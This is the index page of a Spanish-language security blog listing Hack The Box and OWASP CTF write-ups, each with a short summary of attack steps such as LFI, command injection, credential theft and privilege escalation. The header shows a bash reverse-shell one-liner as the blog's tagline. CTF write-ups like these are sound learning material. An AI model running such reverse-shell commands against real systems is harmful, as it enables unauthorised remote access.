sckull - blog
bash -i >& /dev/tcp/localhost/1337 0>&1
Hack The Box - FriendZone
· ✍️ sckull
smbclient dig lfi cron python library hijacking
FriendZone es una maquina CTF Like donde encontramos una vulnerabilidad LFI en uno de los subdominios donde obtuvimos acceso en conjunto con un recurso de SAMBA. Encontramos en un archivo de configuracion una contraseña para el siguiente usuario para finalmente realizar Python Library Hijacking para escalar privilegios.
Hack The Box - FriendZone
Hack The Box - Netmon
· ✍️ sckull
ftp PRTG
Nos topamos con el puerto FTP con autenticacion minima, pudimos acceder a la archivos de configuracion de PRTG Network Monitor donde encontramos credenciales en archivo de configuracion. El software de monitoreo tiene una vulnerabilidad de Command Injection el cual aprovechamos para ejecutar una shell inversa y obtener privilegios de administrador.
Hack The Box - Netmon
Hack The Box - Querier
· ✍️ sckull
smbclient binwalk mssql impacket powershell powerup mssqlclient out-of-band SQL Server
Querier es una maquina de HackTheBox, descubrirmos credenciales en una coneccion de base de datos SQL Server dentro de los macros de Excel (xlsm) lo que nos dio acceso a la base de datos mediante un script de Impacket y que posteriormente nos permitio realizar Out-of-Band para obtener las credenciales, este ultimo nos permitio ejecutar una shell inversa. Tras ejecutar PowerUp encontramos credenciales las cuales utilizamos en PSexec para obtener privilegios de administrador.
Hack The Box - Querier
Hack The Box - Chaos
· ✍️ sckull
wpscan webmin imap pdfTEXT laTex DNS exfil tar firefox
Chaos expone WordPress donde desbloqueamos un post con informacion de WPScan, dicho post presenta credenciales que nos dieron acceso al puerto IMAP, encontramos un correo encriptado el cual nos guió a pdfTEXT (LaTex) donde explotamos un RCE y escapamos de una shell limitada. Contraseñas guardadas en el directorio Firefox nos permitió escalar privilegios.
Hack The Box - Chaos
OWASP CTF 2019 Guatemala - Infraestructura
· ✍️ sckull
OWASP CTF es una maquina del OWASP Guatemala, aqui encontrarás la solucion para obtener la flag user.txt y root.txt de las diferentes maquinas Windows y Linux presentadas por los organizadores.
OWASP CTF 2019 Guatemala - Infraestructura
OWASP CTF 2019 Guatemala - Writeup
· ✍️ sckull
OWASP CTF es una serie de retos del OWASP Guatemala, aqui encontrarás la solucion para obtener las flags de los diferentes retos presentados por los organizadores.
OWASP CTF 2019 Guatemala - Writeup
Hack The Box - Lightweight
· ✍️ sckull
capabilities tcpdump openssl
Nos topamos con un registro de IPs que nos dio acceso por SSH, con tcpdump obtuvimos credenciales que usamos en SSH. Cambiamos al siguiente usuario tras crackear la contraseña encontrada en una conexion de LDAP. Realizamos la lectura de la flag root utilizando openssl.
Hack The Box - Lightweight
Hack The Box - Irked
· ✍️ sckull
UnrealIRC metasploit steganography steghide suid
Irked tiene expuesto el puerto de UnrealIRCd el cual tiene un backdoor, lo que nos dio acceso a la maquina. El siguiente usuario lo obtuvimos por medio de un reto de Esteganografia. Escalamos privilegios mediante un fichero el cual ejecutaba un script donde agregamos una shell inversa.
Hack The Box - Irked